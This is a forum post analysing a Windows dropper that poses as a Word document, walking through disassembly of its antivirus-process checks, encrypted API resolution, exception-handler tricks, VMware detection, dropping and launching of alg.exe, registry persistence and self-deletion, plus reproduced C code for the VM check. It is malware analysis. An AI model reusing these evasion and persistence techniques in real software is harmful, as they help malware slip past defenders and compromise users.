好友
阅读权限30
听众
最后登录1970-1-1
|
h_one
发表于 2013-11-18 09:23
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 zxcfvasd 于 2013-11-18 09:23 编辑
样本基本信息:
作者: h_one
壳信息: 无
受威胁平台: windows
简介:
样本本身以word的图标伪装成.doc文件,其实是一个exe可执行文件。当用户双击次病毒时,该进程会遍历当前进程列表是否有avp.exe,360tray.exe,KsfafSvc.exe,RsTray.exe进程存在。
a.当检测到有杀软进程存在时,就只会创建一个文件‘请你按照表格填写资料.doc’
b.当检测到没有杀软存在时,会显现病毒原型。同样首先创建一个文件‘请你按照表格填写资料.doc’,还会创健alg.exe,最后创建批处理文件hostfix.bat,删除自身
上面提到的文件都会保存在临时文件目录下 c:\DOCUME~1\AYL\LOCALS~1\Temp\xxxxxx
ps:而这个病毒最吸引我的地方是,它在处理关键的行为是都会在异常处理函数中处理。这样一来提高了程序的隐秘性,增加了逆向难度。
详细分析过程:
进入程序主函数,会发现母本自身添加了一条异常链,跟进下断(这也是本病毒‘可爱’之处)
下图中的第一个call功能:CreateFileW当前程序也就是母本,ReadFile读出文件未0x1000字节,然后利用读出的数据计算得到一个值,并利用这个值验证母本是否有被修改。
call 0040189c 获取CreateProcessW函数地址
接下来跟进call 401F59
00401F64 |. E8 17100000 call sample(?00402F80 ; 调用ZwQuerySystemInformation(5)枚举进程信息
00401F69 |. 8945 FC mov [local.1],eax
00401F6C |. 68 18C34000 push sample(?0040C318 ; ASCII "avp.exe"
00401F71 |. 8B45 FC mov eax,[local.1]
00401F74 |. 50 push eax ; ProcessInfo_buf
00401F75 |. E8 61110000 call sample(?004030DB ; 枚举进程名,寻找是否存在avp.exe
00401F7A |. 83C4 08 add esp,0x8
00401F7D |. 85C0 test eax,eax
00401F7F |. 74 11 je Xsample(?00401F92 ; 发现杀软不跳
00401F81 |. 8B0D 60D84000 mov ecx,dword ptr ds:[0x40D860]
00401F87 |. 890D 60D84000 mov dword ptr ds:[0x40D860],ecx
00401F8D |. E9 A4000000 jmp sample(?00402036
00401F92 |> 6A 1F push 0x1F
00401F94 |. E8 D8140000 call sample(?00403471
00401F99 |. 83C4 04 add esp,0x4
00401F9C |. 50 push eax
00401F9D |. 8B55 FC mov edx,[local.1]
00401FA0 |. 52 push edx
00401FA1 |. E8 35110000 call sample(?004030DB ; 360tray.exe
跟进call 00402f80看看
注意上图call 403471函数的参数 ,call 403471函数是机密字符串函数,这里传入的
参数4,对应解密出NtQuerySystemInformation函数
参数1,对应解密出的ntdll
跟踪可以了解到
0x24------------ShellExecuteW
0x22------------Shell32.dll
0x18------------VritualAlloc
0x2 -------------Kernel32.dll
0x5 -------------GetVolumeInformation
0x6--------------GetAdatersInfo
0x3--------------Iphlpapi.dll
0x1--------------ntdll.dll
0x9--------------NtCreateKey
0xA--------------NtClose
0x8--------------NtOpenKey
然后调用LoadLibrary,GetProcAddress函数得到函数地址。之后一系列函数都是使用这种方法来得到调用地址的(在得到调用地址后,call 4033E0又将函数名,dll名加密)
之后
00403000 |> /BA 01000000 /mov edx,0x1
00403005 |. |85D2 |test edx,edx
00403007 |. |74 5A |je Xsample(?00403063
00403009 |. |8D45 FC |lea eax,[local.1]
0040300C |. |50 |push eax
0040300D |. |8B4D F0 |mov ecx,[local.4]
00403010 |. |51 |push ecx
00403011 |. |8B55 F8 |mov edx,[local.2]
00403014 |. |52 |push edx
00403015 |. |6A 05 |push 0x5 ; 枚举进程信息
00403017 |. |FF15 C4D84000 |call dword ptr ds:[0x40D8C4] ; ntdll.ZwQuerySystemInformation
利用ZwQuerySystemInformation()得到当前运行进程
遍历当前运行进程,查看是否存在杀软,若不存在就会执行到下图的call,否则不会执行这个call
跟进这个call
得到 rasdial /disconnect字符串
00401E02 . 8965 E8 mov dword ptr ss:[ebp-0x18],esp
00401E05 . 6A 15 push 0x15
00401E07 . E8 65160000 call sample(?00403471 ; /disconnect
00401E0C . 83C4 04 add esp,0x4
00401E0F . 50 push eax
00401E10 . 6A 14 push 0x14
00401E12 . E8 5A160000 call sample(?00403471 ; rasdial
00401E17 . 83C4 04 add esp,0x4
00401E1A . 50 push eax
00401E1B . 68 10C34000 push sample(?0040C310 ; ASCII "%s %s"
00401E20 . 68 04010000 push 0x104
00401E25 . 8D85 E4FEFFFF lea eax,dword ptr ss:[ebp-0x11C]
00401E2B . 50 push eax
00401E2C . E8 0F300000 call sample(?00404E40 ; strcat
接下来就是制造异常的地方,然后在异常处理函数中执行病毒关键行为,使用的方法是利用time做种子,ecx = rand()这样就造成内存访问异常
(这就是此病毒亮点)
00401E55 . E8 A3270000 call sample(?004045FD ; _time
00401E5A . 83C4 04 add esp,0x4
00401E5D . 50 push eax
00401E5E . E8 72270000 call sample(?004045D5 ; timecola -> [40CE90]
00401E63 . 83C4 04 add esp,0x4
00401E66 . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
00401E6D > B8 01000000 mov eax,0x1
00401E72 . 85C0 test eax,eax
00401E74 . 74 1A je Xsample(?00401E90
00401E76 . E8 64270000 call sample(?004045DF ; _rand
00401E7B . 8985 D8FCFFFF mov dword ptr ss:[ebp-0x328],eax
00401E81 . E8 59270000 call sample(?004045DF ; _rand
00401E86 . 8B8D D8FCFFFF mov ecx,dword ptr ss:[ebp-0x328]
00401E8C . 8801 mov byte ptr ds:[ecx],al ; 会造成异常 然后会到异常处理函数中
00401E8E .^ EB DD jmp Xsample(?00401E6D
00401E90 > C745 FC FFFFF>mov dword ptr ss:[ebp-0x4],-0x1
00401E97 . EB 1A jmp Xsample(?00401EB3
00401E99 . 8D95 DCFCFFFF lea edx,dword ptr ss:[ebp-0x324]
00401E9F . 52 push edx
00401EA0 . E8 D4FEFFFF call sample(?00401D79
00401EA5 . 83C4 04 add esp,0x4
00401EA8 . C3 retn
handle:
00404D68 /$ 55 push ebp ; 结构异常处理程序
00404D69 |. 8BEC mov ebp,esp
00404D6B |. 83EC 08 sub esp,0x8
00404D6E |. 53 push ebx
00404D6F |. 56 push esi
00404D70 |. 57 push edi
00404D71 |. 55 push ebp
00404D72 |. FC cld
00404D73 |. 8B5D 0C mov ebx,[arg.2] ; exception_REGISTRATION
00404D76 |. 8B45 08 mov eax,[arg.1] ; Execption_Record
00404D79 |. F740 04 06000>test dword ptr ds:[eax+0x4],0x6 ; 异常标志
00404D80 |. 0F85 82000000 jnz sample(?00404E08
00404D86 |. 8945 F8 mov [local.2],eax ; [local] = Exception_Record
00404D89 |. 8B45 10 mov eax,[arg.3] ; Context
00404D8C |. 8945 FC mov [local.1],eax ; [local] = Context
00404D8F |. 8D45 F8 lea eax,[local.2]
00404D92 |. 8943 FC mov dword ptr ds:[ebx-0x4],eax
00404D95 |. 8B73 0C mov esi,dword ptr ds:[ebx+0xC]
00404D98 |. 8B7B 08 mov edi,dword ptr ds:[ebx+0x8]
00404D9B |> 83FE FF /cmp esi,-0x1
00404D9E |. 74 61 |je Xsample(?00404E01
00404DA0 |. 8D0C76 |lea ecx,dword ptr ds:[esi+esi*2]
00404DA3 |. 837C8F 04 00 |cmp dword ptr ds:[edi+ecx*4+0x4],0x0
00404DA8 |. 74 45 |je Xsample(?00404DEF
00404DAA |. 56 |push esi
00404DAB |. 55 |push ebp
00404DAC |. 8D6B 10 |lea ebp,dword ptr ds:[ebx+0x10]
00404DAF |. FF548F 04 |call dword ptr ds:[edi+ecx*4+0x4] ;
进入异常处理,,很明显的,可以知道作者是使用_try, _excepte
很明显的知道call dword ptr ds:[edi+ecx*4+0x4] 这个是关键call,,,跟进去看那看干了啥吧
00401E99 . 8D95 DCFCFFFF lea edx,dword ptr ss:[ebp-0x324]
00401E9F . 52 push edx
00401EA0 . E8 D4FEFFFF call sample(?00401D79
00401EA5 . 83C4 04 add esp,0x4
00401EA8 . C3 retn
见call 跟进
可以发现,在异常处理中调用CreateProcessW函数 断宽带连接(weisuo)
00401DB5 |. 51 push ecx
00401DB6 |. 8D55 AC lea edx,[local.21]
00401DB9 |. 52 push edx
00401DBA |. 6A 00 push 0x0
00401DBC |. 6A 00 push 0x0
00401DBE |. 6A 00 push 0x0
00401DC0 |. 6A 01 push 0x1
00401DC2 |. 6A 00 push 0x0
00401DC4 |. 6A 00 push 0x0
00401DC6 |. 8B45 08 mov eax,[arg.1]
00401DC9 |. 50 push eax ; rasdial /disconnect
00401DCA |. 6A 00 push 0x0
00401DCC |. FF15 C0234100 call dword ptr ds:[0x4123C0] ; kernel32.CreateProcessW
004028E6 . E8 11F1FFFF call sample(?004019FC
这个call 创建临时文件C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\请您按照表格填写资料.doc",然后将母本头偏移0x20000处,大小0x6600字节数据拷贝出,并解密,然后WriteFile写入‘请您按照表格填写资料.doc’(欺骗普通用户)最后ShellExecuteW执行.doc文档
00401A9F |. E8 C7F5FFFF call sample(?0040106B
00401AA4 |. 83C4 0C add esp,0xC
00401AA7 |. 68 14254100 push sample(?00412514
00401AAC |. 8D8D F8FDFFFF lea ecx,[local.130]
00401AB2 |. 51 push ecx
00401AB3 |. 68 04254100 push sample(?00412504
00401AB8 |. 8B15 50D84000 mov edx,dword ptr ds:[0x40D850]
00401ABE |. 52 push edx
00401ABF |. E8 1FFAFFFF call sample(?004014E3 ; 拷贝母本偏移0x20000,大小0x6600字节数据并解密,然后
00401AC4 |. 83C4 10 add esp,0x10 ; 使用WriteFile将解密数据写如.doc文档中
00401AC7 |. 85C0 test eax,eax
00401AC9 |. 75 07 jnz Xsample(?00401AD2
00401ACB |. 6A 00 push 0x0
00401ACD |. E8 4F2F0000 call sample(?00404A21
00401AD2 |> 8D85 F8FDFFFF lea eax,[local.130]
00401AD8 |. 50 push eax
00401AD9 |. 68 C0C24000 push sample(?0040C2C0 ; UNICODE ""%s""
00401ADE |. 8D8D F0FBFFFF lea ecx,[local.260]
00401AE4 |. 51 push ecx
00401AE5 |. E8 0C300000 call sample(?00404AF6 ; _swprintf
00401AEA |. 83C4 0C add esp,0xC
00401AED |. 6A 05 push 0x5
00401AEF |. 6A 00 push 0x0
00401AF1 |. 6A 00 push 0x0
00401AF3 |. 8D95 F8FDFFFF lea edx,[local.130]
00401AF9 |. 52 push edx
00401AFA |. 68 CCC24000 push sample(?0040C2CC ; UNICODE "edit"
00401AFF |. 6A 00 push 0x0
00401B01 |. FF15 58D84000 call dword ptr ds:[0x40D858] ; Shell32.ShellExecuteW
00401B07 |. 83C4 18 add esp,0x18
00401B0A |. 8BE5 mov esp,ebp
00401B0C |. 5D pop ebp
哈哈,,杀软都不在,欺骗人的.doc文档也运行起来了。呵呵,得露出怪叔叔面纱了
Whether to do?
使用同样的方法构造异常
00402907 . E8 F11C0000 call sample(?004045FD ; _time
0040290C . 83C4 04 add esp,0x4
0040290F . 50 push eax
00402910 . E8 C01C0000 call sample(?004045D5
00402915 . 83C4 04 add esp,0x4
00402918 . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
0040291F > B8 01000000 mov eax,0x1
00402924 . 85C0 test eax,eax
00402926 . 74 14 je Xsample(?0040293C
00402928 . E8 B21C0000 call sample(?004045DF ; _rand
0040292D . 8945 C8 mov dword ptr ss:[ebp-0x38],eax
00402930 . E8 AA1C0000 call sample(?004045DF ; _rand
00402935 . 8B4D C8 mov ecx,dword ptr ss:[ebp-0x38] ; ecx = 前一个_rand值
00402938 . 8801 mov byte ptr ds:[ecx],al ; 构造异常
顺利进入异常,进入次call
见call进入来到这里,,呵呵,还来做了一个虚拟机检查,方法是使用特权指令,(ps:这个病毒真是聪明啊,知道现在的杀软厉害,就不和杀软较劲,就这样就躲避了杀软的虚拟机引擎,然后杀软就很难发现它了)
004025B8 . C745 E4 01000>mov dword ptr ss:[ebp-0x1C],0x1
004025BF . C745 FC 00000>mov dword ptr ss:[ebp-0x4],0x0
004025C6 . 52 push edx
004025C7 . 51 push ecx
004025C8 . 53 push ebx
004025C9 . B8 68584D56 mov eax,0x564D5868
004025CE . BB 00000000 mov ebx,0x0
004025D3 . B9 0A000000 mov ecx,0xA
004025D8 . BA 58560000 mov edx,0x5658
004025DD . ED in eax,dx
004025DE . 81FB 68584D56 cmp ebx,0x564D5868
004025E4 . 0F9445 E4 sete byte ptr ss:[ebp-0x1C]
004025E8 . 5B pop ebx
004025E9 . 59 pop ecx
004025EA . 5A pop edx
004025EB . C745 FC FFFFF>mov dword ptr ss:[ebp-0x4],-0x1
004025F2 . EB 17 jmp Xsample(?0040260B
004025F4 . B8 01000000 mov eax,0x1
接下来进入异常的第二个关键函数
00404DEB |. FF548F 08 |call dword ptr ds:[edi+ecx*4+0x8]
00402955 . 8B65 E8 mov esp,dword ptr ss:[ebp-0x18]
00402958 . C745 FC FFFFF>mov dword ptr ss:[ebp-0x4],-0x1
0040295F > 33C0 xor eax,eax
00402961 . 85C0 test eax,eax
00402963 .^ 75 A0 jnz Xsample(?00402905
00402965 . E8 A4F1FFFF call sample(?00401B0E
接下来在临时文件目录下创建alg.exe,拷贝出母本中的数据,并解密得到alg.exe的数据,然后写入
004016C0 |. 0395 BCFDFFFF ||add edx,[local.145]
004016C6 |. 33C0 ||xor eax,eax
004016C8 |. 8A02 ||mov al,byte ptr ds:[edx]
004016CA |. 8B4D 0C ||mov ecx,[arg.2]
004016CD |. 038D C8FDFFFF ||add ecx,[local.142]
004016D3 |. 33D2 ||xor edx,edx
004016D5 |. 8A51 10 ||mov dl,byte ptr ds:[ecx+0x10]
004016D8 |. 33C2 ||xor eax,edx
004016DA |. 8885 C4FDFFFF ||mov byte ptr ss:[ebp-0x23C],al
004016E0 |. 8B45 0C ||mov eax,[arg.2]
004016E3 |. 0385 C8FDFFFF ||add eax,[local.142]
004016E9 |. 8B8D D0FDFFFF ||mov ecx,[local.140]
004016EF |. 038D BCFDFFFF ||add ecx,[local.145]
004016F5 |. 8A50 10 ||mov dl,byte ptr ds:[eax+0x10]
004016F8 |. 2A11 ||sub dl,byte ptr ds:[ecx]
004016FA |. 8B45 0C ||mov eax,[arg.2]
004016FD |. 0385 C8FDFFFF ||add eax,[local.142]
00401703 |. 8850 10 ||mov byte ptr ds:[eax+0x10],dl
00401706 |. 8B8D D0FDFFFF ||mov ecx,[local.140]
0040170C |. 038D BCFDFFFF ||add ecx,[local.145]
00401712 |. 8A95 C4FDFFFF ||mov dl,byte ptr ss:[ebp-0x23C]
00401718 |. 8811 ||mov byte ptr ds:[ecx],dl
0040171A |.^ E9 68FFFFFF |\jmp sample(?00401687 ; 母本中拷贝出的数据解密
解密得到的alg.exe数据,大小0x11000,,现在可以用loadpe将其dump出来,(ps:现在猜测应该是一个木马,待会儿享用吧。。。)
接下来这个call
00401771 |. 50 push eax ; alg.exe数据
00401772 |. 8B8D CCFDFFFF mov ecx,[local.141]
00401778 |. 51 push ecx ; size
00401779 |. E8 47FBFFFF call sample(?004012C5 ; 以时间作为种子得到数据,然后修改子程序偏移F040处A字迹数据
004012DB |. E8 1D330000 call sample(?004045FD ; _time
004012E0 |. 83C4 04 add esp,0x4
004012E3 |. 50 push eax
004012E4 |. E8 EC320000 call sample(?004045D5 ; 将时间保存在[40CE90]
004012E9 |. 83C4 04 add esp,0x4
004012EC |. C745 FC 00000>mov [local.1],0x0
004012F3 |. EB 09 jmp Xsample(?004012FE
004012F5 |> 8B45 FC /mov eax,[local.1]
004012F8 |. 83C0 01 |add eax,0x1
004012FB |. 8945 FC |mov [local.1],eax
004012FE |> 8B4D FC mov ecx,[local.1]
00401301 |. 3B4D 0C |cmp ecx,[arg.2] ; size
00401304 |. 73 60 |jnb Xsample(?00401366
00401306 |. 6A 0A |push 0xA
00401308 |. 8B55 08 |mov edx,[arg.1] ; addr\
0040130B |. 0355 FC |add edx,[local.1]
0040130E |. 52 |push edx
0040130F |. 68 80C04000 |push sample(?0040C080
00401314 |. E8 472F0000 |call sample(?00404260 ; _strncmp (在子程序数据中寻找F1字符
00401319 |. 83C4 0C |add esp,0xC
0040131C |. 85C0 |test eax,eax
0040131E |. 75 44 |jnz Xsample(?00401364 ; 找到F1 地址F040
00401320 |. C745 F8 00000>|mov [local.2],0x0
00401327 |. EB 09 |jmp Xsample(?00401332
00401329 |> 8B45 F8 |/mov eax,[local.2]
0040132C |. 83C0 02 ||add eax,0x2
0040132F |. 8945 F8 ||mov [local.2],eax
00401332 |> 837D F8 0A | cmp [local.2],0xA
00401336 |. 7D 24 ||jge Xsample(?0040135C
00401338 |. E8 A2320000 ||call sample(?004045DF ; _rand
0040133D |. 8945 F4 ||mov [local.3],eax ; 以时间作为随便种子,然后写入子程序中
00401340 |. 6A 02 ||push 0x2
00401342 |. 8D4D F4 ||lea ecx,[local.3]
00401345 |. 51 ||push ecx ; Src
00401346 |. 8B55 FC ||mov edx,[local.1]
00401349 |. 0355 F8 ||add edx,[local.2]
0040134C |. 8B45 08 ||mov eax,[arg.1]
0040134F |. 03C2 ||add eax,edx
00401351 |. 50 ||push eax ; 修改找地址F040处
00401352 |. E8 492F0000 ||call sample(?004042A0 ; memcpy
00401357 |. 83C4 0C ||add esp,0xC
0040135A |.^ EB CD |\jmp Xsample(?00401329 ; 共写A字节,,,每次运行母本使子程序alg不同(这样增强alg.exe程序的生存力)
进入上图的最后一个call
char __cdecl sub_403260(void *Src, const void *a2, int a3, int a4)
{
for ( i = 0; i < 4; ++i )
*((_BYTE *)Src + i) ^= *(_BYTE *)(i + a4);
for ( j = 0; j < 6; ++j )
*((_BYTE *)a2 + j) ^= *(_BYTE *)(j + a4 + 4);
memcpy((void *)a3, Src, 2u);
memcpy((void *)(a3 + 2), a2, 6u);
memcpy((void *)(a3 + 8), (char *)Src + 2, 2u);
memcpy((void *)(a3 + 10), a2, 6u);
v6 = *(_BYTE *)(a3 + 1) ^ *(_BYTE *)a3;
for ( k = 2; k < 8; ++k )
{
*(_BYTE *)(k + a3) ^= v6;
v6 += *(_BYTE *)(k + a3);
}
v4 = *(_BYTE *)(a3 + 9) ^ *(_BYTE *)(a3 + 8);
result = v4 + v6;
v7 = v4 + v6;
for ( l = 10; l < 16; ++l )
{
result = l + a3;
*(_BYTE *)(l + a3) ^= v7;
v7 += *(_BYTE *)(l + a3);
}
return result;
}
时候再次来到
00404DAF |. FF548F 04 |call dword ptr ds:[edi+ecx*4+0x4] ; 查看虚拟机
再次使用异常处理,执行病毒关键行为
00401D3B . 8D95 D0FAFFFF lea edx,dword ptr ss:[ebp-0x530]
00401D41 . 52 push edx //alg.exe
00401D42 . E8 32000000 call sample(?00401D79
00401D47 . 83C4 04 add esp,0x4
00401D4A . C3 retn
call 00401D79
00401DAC |. 66:C745 DC 00>mov word ptr ss:[ebp-0x24],0x0
00401DB2 |. 8D4D F0 lea ecx,[local.4]
00401DB5 |. 51 push ecx ; /pProcessInfo
00401DB6 |. 8D55 AC lea edx,[local.21] ; |
00401DB9 |. 52 push edx ; |pStartupInfo
00401DBA |. 6A 00 push 0x0 ; |CurrentDir = NULL
00401DBC |. 6A 00 push 0x0 ; |pEnvironment = NULL
00401DBE |. 6A 00 push 0x0 ; |CreationFlags = 0
00401DC0 |. 6A 01 push 0x1 ; |InheritHandles = TRUE
00401DC2 |. 6A 00 push 0x0 ; |pThreadSecurity = NULL
00401DC4 |. 6A 00 push 0x0 ; |pProcessSecurity = NULL
00401DC6 |. 8B45 08 mov eax,[arg.1] ; |
00401DC9 |. 50 push eax ;
00401DCA |. 6A 00 push 0x0 ; |ModuleFileName = NULL
00401DCC |. FF15 C0234100 call dword ptr ds:[0x4123C0] ; \CreateProcessW
00401DD2 |. B8 01000000 mov eax,0x1
创建alg.exe进程,(这个应该是病毒真正的面纱)
之后调用NtCreateKey创建键,然后ZwOpenKey,ZwSetValueKey设置注册表,"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alg.exe"键值,键名:StubPath
最后一个call 在临时文件目录下创建批处理文件hostfix.bat
作用就是删除母本自身。
0040268D > \8B4D 08 mov ecx,dword ptr ss:[ebp+0x8]
00402690 . 51 push ecx ; /StringToAdd
00402691 . 8D95 C8FCFFFF lea edx,dword ptr ss:[ebp-0x338] ; |
00402697 . 52 push edx ; |ConcatString
00402698 . FF15 04B04000 call dword ptr ds:[<&KERNEL32.lstrc>; \lstrcatW
0040269E . 6A 00 push 0x0 ; /hTemplateFile = NULL
004026A0 . 6A 00 push 0x0 ; |Attributes = 0
004026A2 . 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004026A4 . 6A 00 push 0x0 ; |pSecurity = NULL
004026A6 . 6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004026A8 . 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
004026AD . 8D85 C8FCFFFF lea eax,dword ptr ss:[ebp-0x338] ; |
004026B3 . 50 push eax ; |FileName
004026B4 . FF15 20B04000 call dword ptr ds:[<&KERNEL32.Creat>; \CreateFileW
004026BA . 8985 C4FCFFFF mov dword ptr ss:[ebp-0x33C],eax ; 创建.bat文件
004026C0 . 83BD C4FCFFFF>cmp dword ptr ss:[ebp-0x33C],-0x1
004026C7 . 75 07 jnz Xsample(?004026D0
004026C9 . 33C0 xor eax,eax
004026CB . E9 93010000 jmp sample(?00402863
004026D0 > C785 D4FEFFFF>mov dword ptr ss:[ebp-0x12C],0x0
004026DA . EB 0F jmp Xsample(?004026EB
004026DC > 8B8D D4FEFFFF mov ecx,dword ptr ss:[ebp-0x12C]
004026E2 . 83C1 01 add ecx,0x1
004026E5 . 898D D4FEFFFF mov dword ptr ss:[ebp-0x12C],ecx
004026EB > 83BD D4FEFFFF>cmp dword ptr ss:[ebp-0x12C],0x4B
004026F2 . 73 46 jnb Xsample(?0040273A
004026F4 . 8B95 D4FEFFFF mov edx,dword ptr ss:[ebp-0x12C]
004026FA . 33C0 xor eax,eax
004026FC . 8A82 34C04000 mov al,byte ptr ds:[edx+0x40C034]
00402702 . 8985 DCFEFFFF mov dword ptr ss:[ebp-0x124],eax
00402708 . 8B8D D4FEFFFF mov ecx,dword ptr ss:[ebp-0x12C]
0040270E . 8A91 34C04000 mov dl,byte ptr ds:[ecx+0x40C034]
00402714 . 3215 30C04000 xor dl,byte ptr ds:[0x40C030]
0040271A . 8B85 D4FEFFFF mov eax,dword ptr ss:[ebp-0x12C]
00402720 . 8890 34C04000 mov byte ptr ds:[eax+0x40C034],dl
00402726 . 8A0D 30C04000 mov cl,byte ptr ds:[0x40C030]
0040272C . 028D DCFEFFFF add cl,byte ptr ss:[ebp-0x124]
00402732 . 880D 30C04000 mov byte ptr ds:[0x40C030],cl
00402738 .^ EB A2 jmp Xsample(?004026DC
0040273A > 68 04010000 push 0x104
最后同样是利用自己构造异常,然后在异常处理函数中运行hostfix.bat 删除自身
母本到此的行为就分析完了,
来总结下,这个病毒为啥一开始杀软对它无动于衷吧
1.各种危险函数,重要api都是通过一个索引值,然后解密得到api函数名,之后通过LoadLirbry,GetProcAddress函数得到函数调用地址
2.通过ZwQuerySystemInformation 函数得到运行进程,然后查看是否存在杀软,若存在就不跟杀软较劲。就只创建一个.doc文档
3.现在的虚拟机大都用到虚拟机引擎运行病毒,此病毒会在会在异常处理中进行虚拟机检查,发现是在虚拟机中就退出·
4.发现不在虚拟中,同时没有杀软。然后就在母本载体上获取,alg.exe数据,并解密。然后自己构造异常,在异常处理中运行alg.exe。
虚拟机检查代码:
BOOL IsbVm()
{
BOOL bRet = TRUE;
_try
{
__asm
{
push edx
push eax
push ebx
mov eax, 'VMXh'
mov ebx, 0x0
mov ecx, 0xA
mov edx, 'VX' //端口号
in eax, dx //从端口读取VM版本到eax
cmp ebx, 'VMXh'
setz [bRet]
pop ebx
pop eax
pop edx
}
}
_except(EXCEPTION_EXECUTE_HANDLER)
{
bRet = FALSE;
}
return bRet;
}
int main(int argc, char *argv[])
{
if (IsbVm())
{
MessageBox(NULL, _T("Find VM"), _T("OK"), MB_OK);
}
else
MessageBox(NULL, _T("Not VM"), _T("Error"), MB_OK);
return 0;
}
接下来就是分析,真真的罪魁过手alg.exe
|
|
|
发表于 2013-11-18 15:13
